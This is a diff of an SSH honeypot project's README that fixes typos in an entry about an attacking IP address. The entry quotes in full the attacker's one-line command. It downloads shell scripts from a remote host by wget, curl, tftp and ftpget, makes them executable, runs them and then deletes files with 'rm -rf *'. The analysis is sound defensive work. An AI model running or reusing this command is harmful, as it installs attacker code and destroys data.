cseid2001/ssh-honeypot-project/README.md

 ### 206.189.80.159

 According to abuseipdb.com, this is a known malicious ip with over 100 reports.
-Like the previous malicious IP we investigated, they also seem to be utilizing Digital Ocean cloud services to launch their attacks from.
+Like the previous malicious IP we investigated, they also seem to be utilizing Digital Ocean cloud services to launch their attacks.

 This attacker only tried to run one command:

 `cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://103.178.235.240/ohshit.sh; curl -O http://103.178.235.240/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 103.178.235.240 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 103.178.235.240; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 103.178.235.240 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *`

 Purpose: The script first attempts to change directories to a series of locations on the local system (/tmp, /var/run, /mnt, /root, or /), presumably trying to find an accessible location to operate from.
-It then tries to download a potentially malicous file using three different download methods (curl, tftp, and ftpget).
+It then tries to download a potentially malicious file using three different download methods (curl, tftp, and ftpget).

 ### 189.110.129.57